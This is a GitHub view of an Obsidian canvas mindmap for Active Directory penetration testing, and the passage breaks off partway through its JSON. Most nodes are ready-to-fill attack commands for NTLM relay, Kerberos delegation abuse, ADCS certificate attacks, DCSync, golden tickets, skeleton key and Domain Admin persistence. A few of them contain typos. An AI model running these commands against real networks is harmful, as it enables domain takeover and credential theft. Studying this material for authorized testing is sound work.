-
Notifications
You must be signed in to change notification settings - Fork 53
/
Mindmap AD.canvas
1885 lines (1885 loc) · 244 KB
/
Mindmap AD.canvas
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
{
"nodes":[
{"type":"group","id":"199b056b1db84f69","x":10012,"y":-7461,"width":3500,"height":6311,"color":"#484e7f","label":"Lateral move"},
{"type":"group","id":"c87e6944b87219c0","x":10036,"y":1137,"width":7315,"height":2796,"color":"#2b9c8f","label":"Kwerberos Delegation Move"},
{"type":"group","id":"b6206e85d328c77d","x":6157,"y":-4774,"width":2968,"height":3228,"color":"#ff00ff","label":"Got administrator access on one machine"},
{"type":"group","id":"313b2b0bc3e14fb5","x":2003,"y":-6436,"width":3403,"height":2498,"color":"#969292","label":"Privilege escalation"},
{"type":"group","id":"2cb2c783e9a8286b","x":6609,"y":-1246,"width":2049,"height":3028,"color":"#001eff","label":"Permissions move"},
{"type":"group","id":"ac10115c0ab46bff","x":4145,"y":-1134,"width":2206,"height":2760,"color":"#37ff00","label":"Valid credentials"},
{"type":"group","id":"2eeaf30e7d43aa1e","x":-30,"y":-1972,"width":3012,"height":1472,"color":"4","label":"Classic quick compromission methods"},
{"type":"group","id":"318f3e28c4e1e98e","x":1967,"y":-3472,"width":3439,"height":1238,"color":"#7c0404","label":"Known Vulnerabilities"},
{"type":"group","id":"ac88013e301f4359","x":-1767,"y":-1029,"width":1439,"height":2462,"label":"No credentials"},
{"type":"group","id":"a648cb90f6797cf5","x":44,"y":118,"width":1792,"height":1542,"color":"#31dbdd","label":"Got username & NO password"},
{"type":"group","id":"dbaced8dfb7fd663","x":2225,"y":1234,"width":1739,"height":1289,"color":"2","label":"Cracking hash"},
{"type":"group","id":"df61625888e28d54","x":10253,"y":-695,"width":2779,"height":690,"color":"1","label":"Domain admin"},
{"type":"group","id":"d9617607e4231ae4","x":13922,"y":-562,"width":737,"height":212,"color":"#7600ad","label":"Is enterprise admin?"},
{"type":"group","id":"0e733c969c37a0dd","x":5081,"y":4430,"width":7417,"height":2506,"color":"#643900","label":"Weak ADCS Configuration"},
{"type":"group","id":"3de84bfe460894aa","x":110,"y":2737,"width":3080,"height":2391,"color":"3","label":"MITM (Listen and relay)"},
{"type":"group","id":"2bed23ec27275c48","x":14502,"y":-2749,"width":3657,"height":1743,"color":"#85afd5","label":"Trust relationship / Forest to Forest"},
{"type":"group","id":"1c4d6f661b1e09b8","x":459,"y":3244,"width":2635,"height":1526,"color":"3","label":"NTLM Relay"},
{"type":"group","id":"6c0a33a4c3980f63","x":14947,"y":-583,"width":1727,"height":1452,"color":"#305010","label":"Persistence"},
{"type":"group","id":"d00cf0b295950050","x":459,"y":2838,"width":1219,"height":333,"color":"3","label":"Listener"},
{"type":"group","id":"394eb6dedb87ac1e","x":459,"y":4870,"width":655,"height":191,"color":"3","label":"ARP Poisoning"},
{"type":"text","text":"trustlink","id":"0fc7cac354c8db5d","x":15869,"y":-1156,"width":115,"height":50},
{"type":"text","text":"MSSQL","id":"c900a2203024522d","x":16485,"y":-1206,"width":108,"height":50,"color":"#484e7f"},
{"type":"text","text":"```PowerView\nGet-DOmainForeignGroupMember -Domain <target>\n```","id":"daf0653a0f7f783c","x":15233,"y":-1671,"width":419,"height":50},
{"type":"text","text":"User on both domains","id":"8b268e45d144d2d2","x":15233,"y":-1601,"width":250,"height":60},
{"type":"text","text":"Users with foreign Domain Group Membership","id":"5c0ba8fe75642b29","x":15233,"y":-1837,"width":419,"height":50},
{"type":"text","text":"Groups with Foreign Domain Group Membership","id":"4418655d4b864df0","x":15233,"y":-1751,"width":419,"height":50},
{"type":"text","text":"Breaking forest trust (printerbug or petitpotam to force the DC of the external forest to connect on a local unconstrained delegation machine. Capture TGT, inject into memory and dsync)","id":"61a5e0ecbe9de226","x":14892,"y":-1931,"width":725,"height":68},
{"type":"text","text":"Child Domain to Forest Compromise - extra SIDs\n","id":"f06bda543d13b44c","x":14914,"y":-2111,"width":306,"height":55},
{"type":"text","text":"ForeignGroupMember","id":"2fb2ecc2691c3b28","x":14903,"y":-1731,"width":250,"height":60},
{"type":"text","text":"Trust relationship","id":"f4a7d449136fdf6f","x":14565,"y":-1732,"width":166,"height":61,"color":"#85afd5"},
{"type":"text","text":"sp_linkedservers","id":"c2728a3f29afd86d","x":16022,"y":-1156,"width":168,"height":50},
{"type":"text","text":"use_link","id":"63a9f5f3e1462f34","x":16235,"y":-1156,"width":115,"height":50},
{"type":"text","text":"```cmd\nmimikatz lsadump::dcsync /domain:<domain> /user:<domain>\\krbtgt\n```","id":"b5b44b222f695b28","x":16371,"y":-1395,"width":588,"height":60},
{"type":"text","text":"Forest To Forest - extra SID \n(SID History / TREAT_AS_EXTERNAL)","id":"d84fedca7ebbb21e","x":14892,"y":-1397,"width":306,"height":63},
{"type":"text","text":"Password reuse","id":"2c0c952737065123","x":14892,"y":-1521,"width":250,"height":60},
{"type":"text","text":"Forest To Forest Compromise - MSSQL trusted links","id":"11713edbfc400ec8","x":14892,"y":-1204,"width":306,"height":73},
{"type":"text","text":"```PowerView\n(SID filtering, Find group with SID > 1000) Get-DomainGroupMember -Identity \"<group\"-Domain <target_domain>\n```","id":"ab10a723ac50ca60","x":15751,"y":-1409,"width":541,"height":88},
{"type":"text","text":"```PowerView\nGet-DomainSID -Domain <domain>\n```\n\n```PowerView\nGet-DomainSID -Domain <target-doman>\n```","id":"1c9acdf78c74c468","x":15275,"y":-1425,"width":416,"height":119},
{"type":"text","text":"```Powershell\nGet-SQLServerLinkCrawl -username <user> -password <pass> -Verbose -Instance <sql_instance>\n``````","id":"c0b006280dbf5ff9","x":15275,"y":-1254,"width":1017,"height":50},
{"type":"text","text":"Lateral move (cred/th/..)","id":"db061ae9b2747e3c","x":15220,"y":-1516,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"```PowerView\nGet-DomainSID -domain <domain>\n```\n\n```PowerView\nGet-DomainSID -domain <target_domain>\n```","id":"c882b61fc8b1d367","x":15267,"y":-2150,"width":464,"height":133},
{"type":"text","text":"Unconstrained delegation","id":"be867b56016a5746","x":15691,"y":-1927,"width":250,"height":60},
{"type":"text","text":"```bloodhound\nMATCH p=(n:Group {domain:\"<domain>\"})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain AND n.name<>m.name RETURN P\n```","id":"114a49e43b8e7a7c","x":15700,"y":-1751,"width":985,"height":50},
{"type":"text","text":"\n```cmd\nmimikatz lsadump::dcsync /domain:<domain> /user:<domain>\\krbtgt\n```","id":"1e34a698a68ad250","x":15827,"y":-2041,"width":575,"height":50},
{"type":"text","text":"```cmd\nmimikatz lsadump::trust /patch\n```","id":"1d58c9c271766ccd","x":15837,"y":-2200,"width":368,"height":50},
{"type":"text","text":"ACL","id":"e36d62f76d242213","x":15559,"y":-1596,"width":186,"height":50,"color":"#001eff"},
{"type":"text","text":"```bash\nmssqlclient.py -windows-auth <domain>/<user>:<password>@$ip \n```\n\n(pr # 1397)","id":"cbe2a56446b7d8f0","x":15275,"y":-1179,"width":548,"height":96},
{"type":"text","text":"Pass the ticket","id":"b70f058406f350ff","x":17831,"y":-1390,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"```PowerView\nconvertfrom-sid <sid>\n```","id":"b5e902015530e9eb","x":15691,"y":-1671,"width":232,"height":50},
{"type":"text","text":"```bloodhound\nMATCH p=(n:User)-[:MemberOff]->(m:Group) WHERE n.domain=\"<domain>\" AND m.domain<> n.domain RETURN p\n```","id":"4216653e7da68863","x":15700,"y":-1837,"width":875,"height":50},
{"type":"text","text":"```bash\nldeep ldap -u <user> -p '<password>' -d <domain> -s ldap://<dc_ip> trusts\n```","id":"2c357afb33f4a64f","x":15142,"y":-2340,"width":674,"height":53},
{"type":"text","text":"```powershell\nGet-DomainTrust -Domain <domain>\n```","id":"17bc249104dd90b1","x":15142,"y":-2513,"width":473,"height":50},
{"type":"text","text":"```cmd\nmimikatz kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /aes256:<trust_key_aes256> /sids:<target_domain_sid>-519 /service:krbgt /target:<target_domain> /ptt\n```","id":"33c919fc03b9bae3","x":16271,"y":-2222,"width":832,"height":94},
{"type":"text","text":"```PowerView\nGet-DomainTrustMapping\n```","id":"72a431f9153b85be","x":15142,"y":-2439,"width":250,"height":60},
{"type":"text","text":"\n```cmd\nmimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid<user_Sid> /sids:<RootDomainSID-519> /ptt\n```","id":"6a1d01ac93409105","x":16454,"y":-2063,"width":832,"height":94},
{"type":"text","text":"```cmd\nmimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID>-<GROUP_SID_SUP_1000> /ptt\n```","id":"a54df4d799b5ff71","x":17008,"y":-1403,"width":764,"height":76},
{"type":"text","text":"Lateral move PTT","id":"c0aaa5c99344ccbd","x":17523,"y":-2128,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"```cmd\nnltest.exe /trusted_domains\n```","id":"1e8579243f366895","x":15142,"y":-2663,"width":337,"height":50},
{"type":"text","text":"```powershell\n([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()\n```\n","id":"6006925745dff1ff","x":15142,"y":-2591,"width":841,"height":60},
{"type":"text","text":"Persistence","id":"c94789c02c60c7ea","x":14989,"y":-66,"width":128,"height":50,"color":"#305010"},
{"type":"text","text":"DC shadow\n","id":"21358bb419513b13","x":15266,"y":634,"width":266,"height":50},
{"type":"text","text":"ACL manipulation","id":"0afdfcc9c3929e16","x":15266,"y":714,"width":266,"height":50},
{"type":"text","text":"Custom SSP","id":"3874a0cedc008e77","x":15266,"y":446,"width":133,"height":50},
{"type":"text","text":"Golden certificate","id":"a7b298c38145feb0","x":15266,"y":537,"width":266,"height":50},
{"type":"text","text":"Directory Service Restore Mode (DSRM)\n","id":"ae37a466db4cecc6","x":15266,"y":226,"width":266,"height":63},
{"type":"text","text":"Skeleton key","id":"07f7bd164f613352","x":15266,"y":360,"width":133,"height":50},
{"type":"text","text":"Saphire ticket","id":"7a052540280b6cc3","x":15266,"y":148,"width":171,"height":50,"color":"#305010"},
{"type":"text","text":"Diamond ticket","id":"ad0de4c917b7c272","x":15266,"y":69,"width":171,"height":50,"color":"#305010"},
{"type":"text","text":"Enumeration","id":"71ef842aeb070a4c","x":14914,"y":-2518,"width":130,"height":60},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug\" \"misc::memssp\" \"exit\"\n```","id":"4af47f91cdfe1a15","x":15444,"y":444,"width":476,"height":55},
{"type":"text","text":"`C:\\Windows\\System32\\kiwissp.log`","id":"e06e1947f49d6cb1","x":15984,"y":447,"width":325,"height":50},
{"type":"text","text":"```bash\ncertipy forge -ca-pfx <ca_private_key> -upn <user>@<domain> -subject ÇN=<user>,CN=Users,DC=<CORP>,DC=<LOCAL>\n```","id":"dc46d10c1267592b","x":16096,"y":515,"width":426,"height":94},
{"type":"text","text":"```bash\ncertipy ca -backup -ca '<ca_name>' -username <user>@<domain> -hashes <hash>\n```","id":"5d5433335e982652","x":15592,"y":526,"width":426,"height":72},
{"type":"text","text":"```cmd\nmimikatz \"kerberos::golden /sid:<current_user_sid> /target:<target_server> /service:<target_service> /aes256:<computer_aes_key> /user:<any_user> /ptt\"\n```","id":"b8800d08d454190f","x":15521,"y":-196,"width":492,"height":110},
{"type":"text","text":"```bash\nticketer.py -nthash <machine_nt_hash> -domain-sid <domain_sid> -domain <domain> <anyuser>\n```","id":"bec6e4ddad0ac5ed","x":15522,"y":-71,"width":492,"height":110},
{"type":"text","text":"```bash\nticketer.py -aesKey <aeskey> -domain-sid <domain_sid> -domain <domain> <anyuser>\n```","id":"3409c166f6fd8a3a","x":15522,"y":-433,"width":491,"height":86},
{"type":"text","text":"```cmd\nmimikatz \"kerberos::golden /user:<admin_user>/domain:<domain> /sid:<domain-sid>/aes256:<krbtgt_aes256> /ptt\n```","id":"f5246507b43e9a7b","x":15522,"y":-322,"width":491,"height":92},
{"type":"text","text":"password is mimikatz","id":"89f4241d160243fd","x":15984,"y":360,"width":264,"height":50},
{"type":"text","text":"```powershell\nPowerShell New-ItemProperty \"HKLM:\\System\\CurrentControlSet\\Control\\Lsa\n\"-Name\"DsrmAdminLogonBehavior\" -Value 2 -PropertType DWORD\n```","id":"2647c1c3a537867c","x":15592,"y":215,"width":656,"height":85},
{"type":"text","text":"```cmd\nnet group \"domain admins\" myuser /add /domain\n```","id":"710d71c4ea9a0e28","x":15266,"y":-527,"width":480,"height":77},
{"type":"text","text":"GG Good luck for the report!","id":"15d94bfa9c9cd467","x":14320,"y":-483,"width":250,"height":60},
{"type":"text","text":"Silver ticket","id":"c5d3a06a011198ab","x":15266,"y":-136,"width":171,"height":50,"color":"#305010"},
{"type":"text","text":"Golden ticket","id":"f9dc3908afa00010","x":15266,"y":-365,"width":171,"height":50,"color":"#305010"},
{"type":"text","text":"...","id":"936c188eac094e70","x":15266,"y":786,"width":266,"height":50},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug\" \"misc::skeleton\" \"exit\"\n```","id":"f845ec3fee4c3871","x":15444,"y":360,"width":476,"height":50},
{"type":"text","text":"```cmd\nrubeus.exe hash /password:<computer_pass> /usser:<computer> /domain:<domain>\n```","id":"92426f11d07f0e11","x":11551,"y":3384,"width":711,"height":45},
{"type":"text","text":"Object: msDS-AllowedToActOnBehalfOftherIdentit","id":"4dd4b21098478f8f","x":11102,"y":3576,"width":314,"height":87},
{"type":"text","text":"```cmd\nrubeus.exe s4u /user:<fake_computer$> /aes256:<AES 256 HASH> /impersonateuser:administrator /msdsspn:cifs/<victim.domain.local> /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt\n```","id":"15fa50ecaa6a6f1b","x":12316,"y":3350,"width":711,"height":113},
{"type":"text","text":"Admin","id":"fa3ee141ecec6de7","x":13121,"y":3377,"width":125,"height":60,"color":"#ff00ff"},
{"type":"text","text":"```bash\ngetST.py -self -impersonate \"administrator\" -dc-ip <ip> <domain>/<rbcd_com>$':'<rbcd_compass>'\n```","id":"613ff171aee87e05","x":13076,"y":2841,"width":535,"height":70},
{"type":"text","text":"```powershell\nInvoke-Command <target> -Scriptblock {<cmd>}\n```","id":"ea64a2c3574e1bbe","x":13430,"y":2542,"width":457,"height":45},
{"type":"text","text":"```powershell\ndir \\\\<target>\\c$\n```","id":"fb2e9934da7b4a5b","x":13389,"y":2627,"width":250,"height":60},
{"type":"text","text":"CIFS","id":"b9900a48781e9d2b","x":13246,"y":2627,"width":97,"height":60},
{"type":"text","text":"LDAP","id":"49e1bca60ff60977","x":13246,"y":2728,"width":97,"height":60},
{"type":"text","text":"```bash\nrbcd.py -delegate-from '<computer>$' -delegate-to '<target>$' -dc-ip '<dc>' -action 'write' <domain>/<user>:<password>\n```","id":"2a570eea990f7435","x":11551,"y":3585,"width":657,"height":70},
{"type":"text","text":"```bash\ngetST.py -spn host/<dc_fqdn> '<domain>/<computer_account>:<computer_pass>' -impersonate Administrator --dc-ip <dc_ip>\n```","id":"691352e17b9120bf","x":12315,"y":3585,"width":657,"height":70},
{"type":"text","text":"Kerberos TGT","id":"d0d2b00cf57e8b05","x":14005,"y":2517,"width":142,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bash\ngetST.py -spn <constrained_spn>/<target> -hashes '<hash>' '<domain>/<constrained>$' -impersonate Administrator --dc-ip <dc_ip> -additional-ticket <previous_ticket>\n```","id":"7a57f2226d4b2f30","x":14283,"y":2815,"width":504,"height":122},
{"type":"text","text":"```bash\ngetST.py -spn host/<constrained> -hashes '<hash>' '<domain>/<computer_account>'-impersonate Administrator --dc-ip <dc_ip> -additional-ticket <previous_ticket>\n```","id":"c019c4f1400b83d3","x":13706,"y":2828,"width":504,"height":96},
{"type":"text","text":"Kerberos TGT","id":"1641ae8f6456ccf5","x":13121,"y":3595,"width":142,"height":50,"color":"#484e7f"},
{"type":"text","text":"Without protocol transition (kerberos only) \nObject: msDS-AllowedToDelegateTo \nUAC: TRUSTED_FOR_DELEGATION","id":"641cf140dc557743","x":11151,"y":2945,"width":400,"height":104},
{"type":"text","text":"```bash\naddcomputer.py -computer-name '<rbcd_com>$' -computer-pass '<rbcd_compass>' -dc-ip <dc> '<domain>/<user>:<password>'\n```","id":"8595c43671279983","x":11847,"y":2846,"width":535,"height":60},
{"type":"text","text":"RBCD","id":"20645e50be712f32","x":11650,"y":2847,"width":150,"height":60},
{"type":"text","text":"self RBCD","id":"3838a5d430a8aee7","x":11650,"y":3049,"width":150,"height":60,"color":"3"},
{"type":"text","text":"```powershell\nEnter-Pssesion -computername <target>\n```","id":"3c0516048059017b","x":13430,"y":2473,"width":457,"height":45},
{"type":"text","text":"Kerberos TGS","id":"7cbc9342b753b463","x":14894,"y":2851,"width":142,"height":50,"color":"#484e7f"},
{"type":"text","text":"```powershell\npsexec \\\\\\<target> <cmd>\n```","id":"9b7be95564f9a315","x":13430,"y":2372,"width":327,"height":45},
{"type":"text","text":"HOST","id":"f6deb9eca9af1c7c","x":13246,"y":2364,"width":97,"height":60},
{"type":"text","text":"Resource-Based Constrained Delegation (RBCD)","id":"0870711bee1b0662","x":10786,"y":3589,"width":250,"height":60},
{"type":"text","text":"Add computer account","id":"4b231dd4e2c79485","x":11551,"y":3760,"width":250,"height":50},
{"type":"text","text":"Altservice","id":"5f1a746b4edb8248","x":13009,"y":2525,"width":133,"height":60},
{"type":"text","text":"HTTP","id":"4523b8e0114bd1ce","x":13246,"y":2495,"width":97,"height":60},
{"type":"text","text":"```bash\naddcomputer.py -computer-name '<computer_name>' -computer-pass '<ComputerPassword>' -dc-host <dc> -domain-netbios <domain_netbios> '<domain>/<user>:<password>'\n```","id":"fed9fd3af05fbe01","x":11907,"y":3737,"width":657,"height":96},
{"type":"text","text":"Constrained delegation","id":"94f151252d4bb5b8","x":10756,"y":2439,"width":250,"height":60},
{"type":"text","text":"Kerberos Delegation","id":"ce3ed2e87fabc3bf","x":10251,"y":2581,"width":250,"height":60,"color":"#2b9c8f"},
{"type":"text","text":"Zero-logon (safe method) (CVE-2020-1472)","id":"03aa7577dd561f14","x":1040,"y":4612,"width":227,"height":60,"color":"#7c0404"},
{"type":"text","text":"SMB => Netlogon","id":"fa7f3612e8b6bb2c","x":826,"y":4612,"width":167,"height":60,"color":"3"},
{"type":"text","text":"wsus relay","id":"8d43cc23f6800e6a","x":505,"y":4936,"width":164,"height":60,"color":"3"},
{"type":"text","text":"```bash\npywsus.py\n```","id":"6208b8ec8cb8bd51","x":755,"y":4936,"width":250,"height":60},
{"type":"text","text":"=> MSSQL","id":"9fe7e01576c3d5ee","x":826,"y":4443,"width":167,"height":60,"color":"3"},
{"type":"text","text":"relay to mssql","id":"0b23fa8aeba89359","x":1073,"y":4443,"width":143,"height":60},
{"type":"text","text":"http ADCS web","id":"3217f41e9d6f81ac","x":1097,"y":4191,"width":149,"height":60},
{"type":"text","text":"```bash\nntlmrelayx.py -t dcsync://<dc_02_ip> -smb2support -auth-smb <user>:<password>\n```","id":"5d67046ebea70b82","x":1730,"y":4612,"width":681,"height":60},
{"type":"text","text":"coerce come from dc01, relay to dc02","id":"735abd0451488837","x":1326,"y":4612,"width":324,"height":60},
{"type":"text","text":"```bash\nntlmrelayx.py -t mssql://$ip -smb2support -socks\n```","id":"42fcff6fab986d94","x":1294,"y":4448,"width":505,"height":50},
{"type":"text","text":"Lateral move (SOCKS)","id":"b2e9ac9bc43f04f0","x":1879,"y":4443,"width":250,"height":60,"color":"#7da2de"},
{"type":"text","text":"DcSync","id":"b19d3f086e8b4ed5","x":2495,"y":4612,"width":250,"height":60,"color":"#8199cf"},
{"type":"text","text":"ESC8","id":"ae69d038036b0721","x":1290,"y":4191,"width":93,"height":60,"color":"#fa05cd"},
{"type":"text","text":"```bash\nsccm nltm relay attack\n```","id":"a2031b9cc395301b","x":1091,"y":4293,"width":250,"height":60},
{"type":"text","text":"```bash\nnmap -Pn -sS -T4 --open --script smb-security-mode -p 445 <ADDRESS/MASK>\n```","id":"0ab015e539552be3","x":1589,"y":3692,"width":627,"height":61},
{"type":"text","text":"SMB unsigned","id":"80f37d4b7beb09a4","x":1018,"y":3850,"width":162,"height":60},
{"type":"text","text":"HTTP(S) => LDAP","id":"cc9bb624ffbc28b2","x":810,"y":3594,"width":167,"height":60,"color":"3"},
{"type":"text","text":"=> SMB","id":"f3d1352fd1d2d5ef","x":810,"y":3850,"width":167,"height":60,"color":"3"},
{"type":"text","text":"=> HTTP","id":"5e069d4bce2e67f5","x":826,"y":4233,"width":167,"height":60,"color":"3"},
{"type":"text","text":"NetNTLMv2","id":"53c99bd32de19222","x":1046,"y":3489,"width":136,"height":60},
{"type":"text","text":"SMB => LDAP(S)","id":"415c928a4fd4c032","x":809,"y":3436,"width":167,"height":60,"color":"3"},
{"type":"text","text":"User","id":"cc68e92cbeea355c","x":2015,"y":3972,"width":98,"height":55,"color":"5"},
{"type":"text","text":"relay to LDAP","id":"200b2ea34dedb4c0","x":1561,"y":3489,"width":141,"height":60},
{"type":"text","text":"remove mic (CVM-2019-1040)","id":"dd919045083d667c","x":1246,"y":3489,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"```bash\nresponder -i eth0\n```","id":"4206fa0a2cbba7e0","x":768,"y":2864,"width":250,"height":60},
{"type":"text","text":"Listen","id":"243546a3742534e4","x":505,"y":2965,"width":164,"height":60,"color":"3"},
{"type":"text","text":"(MITM)\nListen and Relay","id":"4a5c61595a84f24b","x":189,"y":3976,"width":164,"height":60,"color":"3"},
{"type":"text","text":"NTLM relay","id":"6e94e4f90fb271b7","x":505,"y":3709,"width":164,"height":60,"color":"3"},
{"type":"text","text":"```bash\ncertipy req -u <user>@<domain> -p <password> -target <ca_server> -template <'vulnerable template name'> -ca <ca_name> -upn <target_user>@<domain>\n```","id":"bda9a87543481b48","x":7367,"y":4786,"width":1212,"height":69},
{"type":"text","text":"Get templates information","id":"845bff1b81010be0","x":5489,"y":4940,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy relay -ca <ca_ip> -template DomainController\n```","id":"ec5473aacfece323","x":6024,"y":4685,"width":939,"height":60},
{"type":"text","text":"```cmd\ncertutil -v deTemplate\n```","id":"0f2b297e67e928ee","x":5832,"y":4855,"width":357,"height":60},
{"type":"text","text":"```cmd\ncertify.exe find [/vulnerable]\n```","id":"16c6d749cda99b66","x":5828,"y":4939,"width":361,"height":60},
{"type":"text","text":"Misconfigured Certificate Templates","id":"26c066d4285c92c7","x":6389,"y":4940,"width":319,"height":60},
{"type":"text","text":"ESC2","id":"b3796d45f829be1f","x":6799,"y":4940,"width":106,"height":60,"color":"#ffdd00"},
{"type":"text","text":"```bash\ngettgtpkinit.py -pfx-base64 $(cat cert.b64) <domain>/<dc_name>$ <ccache_file>\n````","id":"1c0868bac742aa59","x":7073,"y":4584,"width":751,"height":60},
{"type":"text","text":"```cmd\nRubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt\n```","id":"2f8fff95a73d437c","x":7073,"y":4494,"width":751,"height":60},
{"type":"text","text":"```bash\ncertipy auth -pfx <certificate> -dc-ip <dc_ip>\n```","id":"abc152b6d50aaa7e","x":7073,"y":4685,"width":751,"height":60},
{"type":"text","text":"Pass the ticket","id":"a133f3265cdd8c64","x":7954,"y":4639,"width":183,"height":60,"color":"#484e7f"},
{"type":"text","text":"DcSync","id":"6f790ee8c7e6003d","x":8191,"y":4639,"width":133,"height":60,"color":"#8199cf"},
{"type":"text","text":"Domain Admin","id":"9f7523567c384ad0","x":8398,"y":4639,"width":250,"height":60,"color":"1"},
{"type":"text","text":"ESC1 (Request a certificate from a vulnerable template)","id":"eb7c5437281c06e5","x":6799,"y":4855,"width":454,"height":60,"color":"#ffdd00"},
{"type":"text","text":"ESC3 (Use an enrollement agent to request a certificate)","id":"ec59616e05a9eb24","x":6799,"y":5028,"width":454,"height":60,"color":"#ffdd00"},
{"type":"text","text":"ESC9","id":"67abcce79376ea7c","x":8344,"y":6374,"width":178,"height":60,"color":"#ffdd00"},
{"type":"text","text":"ESC10 (Case1)","id":"f35137628a9a31c6","x":8344,"y":6495,"width":178,"height":60,"color":"#ffdd00"},
{"type":"text","text":"```cmd\ncertify.exe request request /ca:<server>\\<ca-name> /template:<template> /onbehalfof:<domain>\\<user> /enrollcert:<path.pfx> [/enrollcertpw:<cert-password>]\n```","id":"ec95567a9d40e7c7","x":8512,"y":4973,"width":1522,"height":60},
{"type":"text","text":"ESC1 on vulnerable template","id":"1f9362199d48f905","x":8252,"y":5279,"width":298,"height":60,"color":"4"},
{"type":"text","text":"Restore template","id":"caa231e604de4ac2","x":8615,"y":5279,"width":175,"height":60},
{"type":"text","text":"```bash\ncertipy req -username <user>@<domain> -password <password> -ca <ca_name> -template '<vulnerable template name>' -upn '<target_user>'\n```","id":"8ea2e6f00f9d9fa0","x":8291,"y":5575,"width":1160,"height":45},
{"type":"text","text":"error, but save private key","id":"7acb811072440807","x":9498,"y":5567,"width":250,"height":60},
{"type":"text","text":"```bash\ncertipy template -u <user>@<domain> -p '<password>' -template <vuln_template> -configuration <template>.json\n```","id":"3ae1e2529e78887b","x":8860,"y":5279,"width":1030,"height":60},
{"type":"text","text":"```bash\ncertipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <vulnerable template>\n```","id":"c067a4e13cdd1cfc","x":8578,"y":6374,"width":1124,"height":60},
{"type":"text","text":"```bash\ncertipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <any template with client auth>\n```","id":"7f710eaabde8010d","x":8578,"y":6494,"width":1124,"height":60},
